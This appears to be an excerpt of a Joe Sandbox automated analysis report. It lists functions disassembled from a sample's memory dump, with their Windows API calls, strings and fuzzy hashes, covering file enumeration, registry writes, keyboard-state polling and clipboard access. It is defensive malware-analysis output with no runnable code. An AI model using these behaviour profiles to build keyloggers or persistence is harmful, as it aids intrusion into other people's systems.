                                                                                                                    • Opcode Fuzzy Hash: fcdecfbeabaaeb84fb17bd485f6e5b0b8c64da7856ff00eb431618ea56122dda
                                                                                                                    • Instruction Fuzzy Hash: 98817CB1D02209AFDF12DFA5CC95AEE7BB9FF05308F144169F954A62A1DB318E14DB20
                                                                                                                    Function 0031C75C Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 280timefileCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 0031C78D
                                                                                                                    • FindClose.KERNEL32(00000000), ref: 0031C7E1
                                                                                                                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0031C806
                                                                                                                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0031C81D
                                                                                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 0031C844
                                                                                                                    • __swprintf.LIBCMT ref: 0031C890
                                                                                                                    • __swprintf.LIBCMT ref: 0031C8D3
                                                                                                                      • Part of subcall function 002B7DE1: _memmove.LIBCMT ref: 002B7E22
                                                                                                                    • __swprintf.LIBCMT ref: 0031C927
                                                                                                                      • Part of subcall function 002D3698: __woutput_l.LIBCMT ref: 002D36F1
                                                                                                                    • __swprintf.LIBCMT ref: 0031C975
                                                                                                                      • Part of subcall function 002D3698: __flsbuf.LIBCMT ref: 002D3713
                                                                                                                      • Part of subcall function 002D3698: __flsbuf.LIBCMT ref: 002D372B
                                                                                                                    • __swprintf.LIBCMT ref: 0031C9C4
                                                                                                                    • __swprintf.LIBCMT ref: 0031CA13
                                                                                                                    • __swprintf.LIBCMT ref: 0031CA62
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                                                                                                                    • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                                                                                    • API String ID: 3953360268-2428617273
                                                                                                                    • Opcode ID: b1fdf0fbbf3fc2501c7642537b0cb5b503617044ed8ab0891a88be00fcce5e34
                                                                                                                    • Instruction ID: a78abd15ea064292383a745422fed9480ede189037212ac6c570cc6e0b76c9d0
                                                                                                                    • Opcode Fuzzy Hash: b1fdf0fbbf3fc2501c7642537b0cb5b503617044ed8ab0891a88be00fcce5e34
                                                                                                                    • Instruction Fuzzy Hash: 0DA13CB2418205ABC705EFA4C886DEFB7ECEF99744F400919F595C6191EB30EA58CB62
                                                                                                                    Function 0031EF95 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 119fileCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 0031EFB6
                                                                                                                    • _wcscmp.LIBCMT ref: 0031EFCB
                                                                                                                    • _wcscmp.LIBCMT ref: 0031EFE2
                                                                                                                    • GetFileAttributesW.KERNEL32(?), ref: 0031EFF4
                                                                                                                    • SetFileAttributesW.KERNEL32(?,?), ref: 0031F00E
                                                                                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 0031F026
                                                                                                                    • FindClose.KERNEL32(00000000), ref: 0031F031
                                                                                                                    • FindFirstFileW.KERNEL32(*.*,?), ref: 0031F04D
                                                                                                                    • _wcscmp.LIBCMT ref: 0031F074
                                                                                                                    • _wcscmp.LIBCMT ref: 0031F08B
                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 0031F09D
                                                                                                                    • SetCurrentDirectoryW.KERNEL32(00368920), ref: 0031F0BB
                                                                                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 0031F0C5
                                                                                                                    • FindClose.KERNEL32(00000000), ref: 0031F0D2
                                                                                                                    • FindClose.KERNEL32(00000000), ref: 0031F0E4
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                                                                                    • String ID: *.*
                                                                                                                    • API String ID: 1803514871-438819550
                                                                                                                    • Opcode ID: 90260ae531a72e61c9cdf65ca1ef2c09ed52f5508324681aabc8efa9e02a37d1
                                                                                                                    • Instruction ID: bdce4d841f7451ddffa20d6e235c7ecddb437306f9d42b98d46d6026bc1d6c32
                                                                                                                    • Opcode Fuzzy Hash: 90260ae531a72e61c9cdf65ca1ef2c09ed52f5508324681aabc8efa9e02a37d1
                                                                                                                    • Instruction Fuzzy Hash: 9231F6369002096FCB1AEBB4EC98AEE77AC9F4C360F504176E804E30A1DB70DE80CA55
                                                                                                                    Function 00330857 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00330953
                                                                                                                    • RegCreateKeyExW.ADVAPI32(?,?,00000000,0033F910,00000000,?,00000000,?,?), ref: 003309C1
                                                                                                                    • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00330A09
                                                                                                                    • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00330A92
                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00330DB2
                                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 00330DBF
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Close$ConnectCreateRegistryValue
                                                                                                                    • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                                                    • API String ID: 536824911-966354055
                                                                                                                    • Opcode ID: b75dc4a49fe13169735d4fd483ffc2a90cec271a48a8ca86fbdfb78d74e97234
                                                                                                                    • Instruction ID: df6380323342e277dca4b875104384aefb1df1f053d717a36a21271ef1886e3b
                                                                                                                    • Opcode Fuzzy Hash: b75dc4a49fe13169735d4fd483ffc2a90cec271a48a8ca86fbdfb78d74e97234
                                                                                                                    • Instruction Fuzzy Hash: 0A0247756146019FCB19EF28C891E6AB7E5EF89310F05855DF98A9B3A2CB30EC51CF81
                                                                                                                    Function 002C66E1 Relevance: 25.9, Strings: 20, Instructions: 889COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: 0D5$0E5$0F5$3c,$ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)$pG5$_,
                                                                                                                    • API String ID: 0-3963977302
                                                                                                                    • Opcode ID: 1b39a5b44190389f3191d6a8e8b3b3160d95d18f5febdac97e552aac1a84d809
                                                                                                                    • Instruction ID: 2f911eddfb4c1761da16637632e313ada473cc8971acc41f1925af75eaa11c10
                                                                                                                    • Opcode Fuzzy Hash: 1b39a5b44190389f3191d6a8e8b3b3160d95d18f5febdac97e552aac1a84d809
                                                                                                                    • Instruction Fuzzy Hash: 46728F75E11219DBDB25CF59C894BAEB7F5FF48310F14816AE809EB290E7709E81CB90
                                                                                                                    Function 0031F0F2 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 112fileCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 0031F113
                                                                                                                    • _wcscmp.LIBCMT ref: 0031F128
                                                                                                                    • _wcscmp.LIBCMT ref: 0031F13F
                                                                                                                      • Part of subcall function 00314385: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 003143A0
                                                                                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 0031F16E
                                                                                                                    • FindClose.KERNEL32(00000000), ref: 0031F179
                                                                                                                    • FindFirstFileW.KERNEL32(*.*,?), ref: 0031F195
                                                                                                                    • _wcscmp.LIBCMT ref: 0031F1BC
                                                                                                                    • _wcscmp.LIBCMT ref: 0031F1D3
                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 0031F1E5
                                                                                                                    • SetCurrentDirectoryW.KERNEL32(00368920), ref: 0031F203
                                                                                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 0031F20D
                                                                                                                    • FindClose.KERNEL32(00000000), ref: 0031F21A
                                                                                                                    • FindClose.KERNEL32(00000000), ref: 0031F22C
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                                                                                    • String ID: *.*
                                                                                                                    • API String ID: 1824444939-438819550
                                                                                                                    • Opcode ID: 6335d7205f0a3790c980df49feebb7712177fd8c79a8f23b4464fb4e1de71539
                                                                                                                    • Instruction ID: 49fbc08f1141c6f6d42c1726b4ecd1c6b546fac890bb74ca0c12f8a0e85e7888
                                                                                                                    • Opcode Fuzzy Hash: 6335d7205f0a3790c980df49feebb7712177fd8c79a8f23b4464fb4e1de71539
                                                                                                                    • Instruction Fuzzy Hash: 2D31E93A900219BECB1AEB64EC95EEE77AC9F4D360F510571E800E31A0DB30DE85CA54
                                                                                                                    Function 0031A1EF Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 102fileCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0031A20F
                                                                                                                    • __swprintf.LIBCMT ref: 0031A231
                                                                                                                    • CreateDirectoryW.KERNEL32(?,00000000), ref: 0031A26E
                                                                                                                    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0031A293
                                                                                                                    • _memset.LIBCMT ref: 0031A2B2
                                                                                                                    • _wcsncpy.LIBCMT ref: 0031A2EE
                                                                                                                    • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0031A323
                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0031A32E
                                                                                                                    • RemoveDirectoryW.KERNEL32(?), ref: 0031A337
                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0031A341
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                                                                                    • String ID: :$\$\??\%s
                                                                                                                    • API String ID: 2733774712-3457252023
                                                                                                                    • Opcode ID: f6c95290e2c221f6c8866ece0c71f899689fffe8e80d10dabf59db1c004e02ba
                                                                                                                    • Instruction ID: 3d0681ab22b272f9697cb5ee132e7ac190bcbeff279e8d450ba5e2f642d9cc03
                                                                                                                    • Opcode Fuzzy Hash: f6c95290e2c221f6c8866ece0c71f899689fffe8e80d10dabf59db1c004e02ba
                                                                                                                    • Instruction Fuzzy Hash: D431B475900109ABDB22DFA0DC89FFB77BCEF88741F5045B6F908D2160EB7096958B25
                                                                                                                    Function 0031001C Relevance: 18.2, APIs: 12, Instructions: 186keyboardCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetKeyboardState.USER32(?), ref: 00310097
                                                                                                                    • SetKeyboardState.USER32(?), ref: 00310102
                                                                                                                    • GetAsyncKeyState.USER32(000000A0), ref: 00310122
                                                                                                                    • GetKeyState.USER32(000000A0), ref: 00310139
                                                                                                                    • GetAsyncKeyState.USER32(000000A1), ref: 00310168
                                                                                                                    • GetKeyState.USER32(000000A1), ref: 00310179
                                                                                                                    • GetAsyncKeyState.USER32(00000011), ref: 003101A5
                                                                                                                    • GetKeyState.USER32(00000011), ref: 003101B3
                                                                                                                    • GetAsyncKeyState.USER32(00000012), ref: 003101DC
                                                                                                                    • GetKeyState.USER32(00000012), ref: 003101EA
                                                                                                                    • GetAsyncKeyState.USER32(0000005B), ref: 00310213
                                                                                                                    • GetKeyState.USER32(0000005B), ref: 00310221
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: State$Async$Keyboard
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 541375521-0
                                                                                                                    • Opcode ID: 1b31702c674f1deb9a696592a23fe376ada2cbbc973f98d6dcf8162e59679e8f
                                                                                                                    • Instruction ID: ae16c1f14877cfea4d050a511cd7dd9c746ede3b1f92bc310e403a9e1735addc
                                                                                                                    • Opcode Fuzzy Hash: 1b31702c674f1deb9a696592a23fe376ada2cbbc973f98d6dcf8162e59679e8f
                                                                                                                    • Instruction Fuzzy Hash: 6051D92490478869FB3EDBB088547EABFB49F09380F09459A95C25A5C2DAE49BCCC761
                                                                                                                    Function 003303DA Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00330E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0032FDAD,?,?), ref: 00330E31
                                                                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 003304AC
                                                                                                                      • Part of subcall function 002B9837: __itow.LIBCMT ref: 002B9862
                                                                                                                      • Part of subcall function 002B9837: __swprintf.LIBCMT ref: 002B98AC
                                                                                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0033054B
                                                                                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 003305E3
                                                                                                                    • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00330822
                                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 0033082F
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1240663315-0
                                                                                                                    • Opcode ID: 2754f0c038040d175b83a9e397edd2eaa0388d4c0869054e4a6e5f5a2b3542c6
                                                                                                                    • Instruction ID: 8923b73f941e9437e80e124e69a5ba0126c3684dba7fa2a3911c2d46dc6b6762
                                                                                                                    • Opcode Fuzzy Hash: 2754f0c038040d175b83a9e397edd2eaa0388d4c0869054e4a6e5f5a2b3542c6
                                                                                                                    • Instruction Fuzzy Hash: E1E15E31604200AFCB19DF28C991E6ABBE9EF89314F04896DF94ADB261D730ED11CF91
                                                                                                                    Function 003283BB Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 002B9837: __itow.LIBCMT ref: 002B9862
                                                                                                                      • Part of subcall function 002B9837: __swprintf.LIBCMT ref: 002B98AC
                                                                                                                    • CoInitialize.OLE32 ref: 00328403
                                                                                                                    • CoUninitialize.OLE32 ref: 0032840E
                                                                                                                    • CoCreateInstance.OLE32(?,00000000,00000017,00342BEC,?), ref: 0032846E
                                                                                                                    • IIDFromString.OLE32(?,?), ref: 003284E1
                                                                                                                    • VariantInit.OLEAUT32(?), ref: 0032857B
                                                                                                                    • VariantClear.OLEAUT32(?), ref: 003285DC
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                                                                                    • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                                                    • API String ID: 834269672-1287834457
                                                                                                                    • Opcode ID: 8c9dfdcc4075d271ee4f31186218cf15d97334b0431eb679a02ea815a7951116
                                                                                                                    • Instruction ID: 61362f8386c99ee3b9a9f2c4b5e85bb910ad182790fe2fa85964bf5b45ffba77
                                                                                                                    • Opcode Fuzzy Hash: 8c9dfdcc4075d271ee4f31186218cf15d97334b0431eb679a02ea815a7951116
                                                                                                                    • Instruction Fuzzy Hash: 7661D4706093229FC712EF15E888FAEB7E8AF49754F14491DF9819B291CB70ED44CB92
                                                                                                                    Function 00324164 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1737998785-0
                                                                                                                    • Opcode ID: 706a1be6f5b8790b9850aa50c4be43de33403042912ef32f63105228ac47584f
                                                                                                                    • Instruction ID: f64207d80f9f048b62a710a9a3045b98577fe99a70dddadd2ca15bec8be3fdf0
                                                                                                                    • Opcode Fuzzy Hash: 706a1be6f5b8790b9850aa50c4be43de33403042912ef32f63105228ac47584f
                                                                                                                    • Instruction Fuzzy Hash: C921A135601210DFDB12AF24EC8AB6E7BACEF15750F11842AF946DB2B1DB70AC50CB54
                                                                                                                    Function 003137EF Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 167fileCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 002B4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,002B4743,?,?,002B37AE,?), ref: 002B4770
                                                                                                                      • Part of subcall function 00314A31: GetFileAttributesW.KERNEL32(?,0031370B), ref: 00314A32
                                                                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 003138A3
                                                                                                                    • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 0031394B
                                                                                                                    • MoveFileW.KERNEL32(?,?), ref: 0031395E
                                                                                                                    • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 0031397B
                                                                                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 0031399D
                                                                                                                    • FindClose.KERNEL32(00000000,?,?,?,?), ref: 003139B9
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                                                                                                                    • String ID: \*.*
                                                                                                                    • API String ID: 4002782344-1173974218
                                                                                                                    • Opcode ID: 29218da78ab374f6224f982de2e404b24136db7784a8434c12317bef63abf5be
                                                                                                                    • Instruction ID: b0ebf7691db1104320a76f0348dcfecbeb97442911d919b0becfb74c35286ad0
                                                                                                                    • Opcode Fuzzy Hash: 29218da78ab374f6224f982de2e404b24136db7784a8434c12317bef63abf5be
                                                                                                                    • Instruction Fuzzy Hash: 53517F3180514DAACF0AFBA0C9929EDB779AF58340F640069E406BB191EF316F49CF60
                                                                                                                    Function 0031F3F3 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 120filesleepCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 002B7DE1: _memmove.LIBCMT ref: 002B7E22
                                                                                                                    • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 0031F440
                                                                                                                    • Sleep.KERNEL32(0000000A), ref: 0031F470
                                                                                                                    • _wcscmp.LIBCMT ref: 0031F484
                                                                                                                    • _wcscmp.LIBCMT ref: 0031F49F
                                                                                                                    • FindNextFileW.KERNEL32(?,?), ref: 0031F53D
                                                                                                                    • FindClose.KERNEL32(00000000), ref: 0031F553
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
